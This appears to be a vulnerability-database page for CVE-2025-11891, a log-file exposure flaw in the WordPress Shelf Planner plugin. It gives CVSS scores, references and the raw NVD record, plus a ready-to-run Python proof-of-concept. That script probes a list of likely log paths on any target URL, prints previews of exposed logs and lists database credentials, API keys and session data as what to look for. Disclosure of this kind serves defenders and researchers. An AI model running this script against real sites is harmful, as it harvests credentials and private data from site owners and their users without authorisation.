CVE-2025-11891

Description

The Shelf Planner plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.8.1 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Shelf Planner插件 <= 2.8.1 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11891 PoC - Sensitive Information Exposure via Log Files
# Target: WordPress Shelf Planner Plugin <= 2.8.1
# Author: Security Researcher
# Description: This PoC demonstrates how to access exposed log files

import requests
import sys
from urllib.parse import urljoin

def check_vulnerability(target_url):
    """
    Check if the target is vulnerable to CVE-2025-11891
    """
    # Common log file paths that might be exposed
    log_paths = [
        '/wp-content/plugins/shelf-planner/logs/debug.log',
        '/wp-content/plugins/shelf-planner/logs/error.log',
        '/wp-content/plugins/shelf-planner/logs/shelf-planner.log',
        '/wp-content/uploads/shelf-planner/debug.log',
        '/wp-content/uploads/shelf-planner/logs/debug.log',
        '/wp-content/debug.log',
        '/wp-content/uploads/shelf-planner.log',
        '/wp-content/plugins/shelf-planner/log.txt'
    ]
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] Checking for exposed log files...")
    
    vulnerable = False
    exposed_logs = []
    
    for log_path in log_paths:
        full_url = urljoin(target_url, log_path)
        try:
            response = requests.get(full_url, timeout=10, verify=False)
            
            if response.status_code == 200:
                content = response.text
                # Check if the response contains log-like content
                if any(keyword in content.lower() for keyword in 
                       ['error', 'warning', 'debug', 'exception', 'stack trace', 
                        'sql', 'query', 'wordpress', 'php', 'mysql']):
                    print(f"[+] VULNERABLE: {full_url}")
                    print(f"    Content length: {len(content)} bytes")
                    exposed_logs.append({
                        'url': full_url,
                        'size': len(content),
                        'preview': content[:500]
                    })
                    vulnerable = True
                else:
                    print(f"[*] Found file (not log): {full_url}")
                    
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {full_url}: {e}")
    
    if vulnerable:
        print(f"\n[!] Target is VULNERABLE to CVE-2025-11891")
        print(f"[!] Found {len(exposed_logs)} exposed log files")
        
        # Display first 500 chars of first exposed log
        if exposed_logs:
            print("\n[*] Sample log content (first 500 chars):")
            print("-" * 50)
            print(exposed_logs[0]['preview'])
            print("-" * 50)
    else:
        print("\n[-] Target does not appear to be vulnerable")
    
    return vulnerable, exposed_logs

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-11891-poc.py <target_url>")
        print("Example: python cve-2025-11891-poc.py http://example.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    vulnerable, logs = check_vulnerability(target)
    
    # Save results
    if vulnerable:
        print(f"\n[*] Review the exposed logs for sensitive information")
        print("[*] Possible sensitive data includes:")
        print("    - Database credentials")
        print("    - API keys and tokens")
        print("    - File paths and server configuration")
        print("    - User session information")
        print("    - Debug information")

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11891
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11891
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11891/
[4] VulDB https://vuldb.com/cve/CVE-2025-11891
[5] https://wordpress.org/plugins/shelf-planner/#developers
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/17f17cae-f444-4fa1-9090-ec6ea267ef2e?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11891", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:44.447", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Shelf Planner plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.8.1 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-538"}]}], "references": [{"url": "https://wordpress.org/plugins/shelf-planner/#developers", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/17f17cae-f444-4fa1-9090-ec6ea267ef2e?source=cve", "source": "[email protected]"}]}}